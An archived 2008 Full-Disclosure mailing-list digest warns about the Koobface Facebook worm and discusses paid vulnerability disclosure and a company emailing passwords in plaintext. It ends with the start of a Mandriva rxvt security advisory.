It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when everything was a virus--this is a bot which also spreads/infects on facebook.

Gadi.

-- 
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General,
Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprecation quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From ge at linuxbox.org Thu Aug 7 02:45:30 2008
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 6 Aug 2008 20:45:30 -0500 (CDT)
Subject: [Full-disclosure] [funsec] facebook messages worm

I am constantly updating on this on my twitter account to avoid list clutter:
http://twitter.com/gadievron

You can watch the infection live on a web counter from the hosting provider that the worm points to. This thing is fast-spreading.

Gadi.

On Wed, 6 Aug 2008, Gadi Evron wrote:
> Hi all.
> 
> There's a facebook (possibly worm) something malicious sending fake
> messages from real users (friends).
> 
> The sample also has a remote drop site (verified by someone who shall
> remain nameless).
> 
> This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.
> 
> Infection sites seen so far are on .pl domains.
> 
> The AV industry will soon add detection.
> Facebook's security folks are very capable, so I am not worried on that
> front.
> 
> It's not that we didn't expect this for a long time now, but...
> Be careful. Some users know to be careful in email.. but not on facebook.
> 
> Note: unlike 2003 when we called everything a worm and the 90s when
> everything was a virus--this is a bot which also spreads/infects on facebook.
> 
> Gadi.
> 
> 
> -- 
> "You don't need your firewalls! Gadi is Israel's firewall."
> -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General,
> Israel's Ministry of Finance, at the government's CIO conference, 2005.
> 
> (after two very funny self-deprecation quotes, time to even things up!)
> 
> My profile and resume:
> http://www.linkedin.com/in/gadievron
> _______________________________________________
> Fun and Misc security discussion for OT posts.
> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
> Note: funsec is a public and open mailing list.
> 

From ge at linuxbox.org Thu Aug 7 06:15:24 2008
From: ge at linuxbox.org (Gadi Evron)
Date: Thu, 7 Aug 2008 00:15:24 -0500 (CDT)
Subject: [Full-disclosure] [funsec] facebook messages worm
In-Reply-To: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi>
References: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi>

On Thu, 7 Aug 2008, Juha-Matti Laurio wrote:
> It has the following mechanism according to McAfee:
> http://vil.nai.com/vil/content/v_148955.htm
> 
> They use the name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally
> discovered this threat) uses the name Net-Worm.Win32.Koobface.b.

This is going to *possibly* cause support line bottlenecks tomorrow.

This worm is somewhat similar to zlob, here is a link to a kaspersky paper on a previous iteration of it, they call it koobface:
http://www.kaspersky.com/news?id=207575670

The worm collects spam subject lines from, and then sends the users personal data to the following C&C:
zzzping.com

I spoke with DirectNIC last night and the Registrar Operations (reg-ops) mailing list was updated that the domain is no longer reachable. That was very fast response time from DirectNIC, which we appreciate.

The worm is still fast-spreading, watch the statistics as they fly:
http://www.d9.pl/system/stats.php

The facebook security team is working on this, and they are quite capable. The security operations community has been doing analysis and take-downs, but the worm seems to still be spreading.

All anti virus vendors have been notified, and detection (if not removal) should be added within a few hours to a few days.

For now, while users may get infected, their information is safe (UNLESS the worm has a secondary contact C&C which I have not verified yet).

It seems like some users may have learned not to click on links in email, but any other medium does not compute.

Gadi.

> More information here too:
> http://www.pcmag.com/article2/0,2817,2327272,00.asp
> 
> Juha-Matti
> 
> "John C. A. Bambenek, GCIH, CISSP" [bambenek.infosec at gmail.com] wrote:
>> What's the infection vector? URL Link? Rouge Facebook app?
>> 
>> On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote:
>> 
>> > Hi all.
>> > 
>> > There's a facebook (possibly worm) something malicious sending fake
>> > messages from real users (friends).
>> > 
>> > The sample also has a remote drop site (verified by someone who shall
>> > remain nameless).
>> > 
>> > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his
>> help.
>> > 
>> > Infection sites seen so far are on .pl domains.
>> > 
>> > The AV industry will soon add detection.
>> > Facebook's security folks are very capable, so I am not worried on that
>> > front.
>> > 
>> > It's not that we didn't expect this for a long time now, but...
>> > Be careful. Some users know to be careful in email.. but not on facebook.
>> > 
>> > Note: unlike 2003 when we called everything a worm and the 90s when
>> > everything was a virus--this is a bot which also spreads/infects on
>> > facebook.
>> > 
>> > Gadi.
>> > 
>> > 
>> > -- 
>> > "You don't need your firewalls! Gadi is Israel's firewall."
>> > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the
>> > Accountant General,
>> > Israel's Ministry of Finance, at the government's CIO conference,
>> > 2005.
>> > 
>> > (after two very funny self-deprecation quotes, time to even things
>> up!)
>> > 
>> > My profile and resume:
>> > http://www.linkedin.com/in/gadievron
> 

From ge at linuxbox.org Wed Aug 6 22:44:03 2008
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 6 Aug 2008 16:44:03 -0500 (CDT)
Subject: [Full-disclosure] facebook messages worm

Hi all.

There's a facebook (possibly worm) something malicious sending fake messages from real users (friends).

The sample also has a remote drop site (verified by someone who shall remain nameless).

This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that front.

It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when everything was a virus--this is a bot which also spreads/infects on facebook.

Gadi.

-- 
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General,
Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprecation quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron

From dennis at conus.info Thu Aug 7 15:14:14 2008
From: dennis at conus.info (Dennis Yurichev)
Date: Thu, 7 Aug 2008 17:14:14 +0300
Subject: [Full-disclosure] question
Message-ID: <532075.20080807171414@conus.info>

Hello,

Are there any well-known vendors who would like to buy 0day exploits for their own products?

-- 
My PGP public key: http://yurichev.com/dennis.yurichev.asc
From wilder_jeff at msn.com Thu Aug 7 17:09:12 2008
From: wilder_jeff at msn.com (wilder_jeff Wilder)
Date: Thu, 7 Aug 2008 10:09:12 -0600
Subject: [Full-disclosure] When will they ever get it !?!?!?!

As you will all know I am one never to post, but I had to bring this to a discussion point.

I received an e-mail today from the Gallup Journal inviting me to join their LEET management spam list. Within this invitation, they had provided me with my username (Ahhh how nice) and my password ({GASP} OMG!) in clear text (WTF!). So, I track down the domain admin... she has no idea... I get run through the support gauntlet until I insist upon a supervisor, Please hold. As I sit and listen to something that should be played at a funeral, not much further from the death march, I was graciously hung up on; the man is now pissed.

I wouldn't be so upset had this username and password been generic or single use, but it is from active websites that I currently visit. I can understand if I had asked them to send me a password... or had a formal relationship with them; however, this is not the case.

I was wondering if anyone else received this same e-mail?

As a security assessor, I see so many large companies that just don't get it. What will it take for an organization such as Gallup to understand the fundamentals of security.

-enjoy!

From Valdis.Kletnieks at vt.edu Thu Aug 7 16:56:43 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 07 Aug 2008 11:56:43 -0400
Subject: [Full-disclosure] question
In-Reply-To: Your message of "Thu, 07 Aug 2008 17:14:14 +0300." <532075.20080807171414@conus.info>
References: <532075.20080807171414@conus.info>
Message-ID: <34751.1218124603@turing-police.cc.vt.edu>

On Thu, 07 Aug 2008 17:14:14 +0300, Dennis Yurichev said:
> Are there any well-known vendors who would like to buy 0day exploits
> for their own products?

Yes, there are.

Next question?

From dennis at conus.info Thu Aug 7 21:22:40 2008
From: dennis at conus.info (Dennis Yurichev)
Date: Thu, 7 Aug 2008 23:22:40 +0300
Subject: [Full-disclosure] question
Message-ID: <157137144.20080807232240@conus.info>

Hello,

I'm sorry, I wrote my question incorrectly. I meant, who among software companies would like to know about vulnerabilities in their own products and *also* would like to pay for this? Is it possible to work with them as an independent security researcher?

-- 
My PGP public key: http://yurichev.com/dennis.yurichev.asc

From security at mandriva.com Thu Aug 7 21:51:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 07 Aug 2008 14:51:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:161 ] rxvt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:161
http://www.mandriva.com/security/
_______________________________________________________________________

Package : rxvt
Date    : August 7, 2008
Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A vulnerability in rxvt allowed it to open a terminal on :0 if the environment variable was not set, which could be used by a local user to hijack X11 connections (CVE-2008-1142).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1142
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.1:
57b033071ca6cf454e53679cfc946215  2007.1/i586/rxvt-2.7.10-16.1mdv2007.1.i586.rpm
987dfd1fc331f8047320a567205f2b0e  2007.1/i586/rxvt-CJK-2.7.10-16.1mdv2007.1.i586.rpm
22d14c838873f3a5a12953ddc80b379f  2007.1/SRPMS/rxvt-2.7.10-16.1mdv2007.1.src.rpm

Mandriva Linux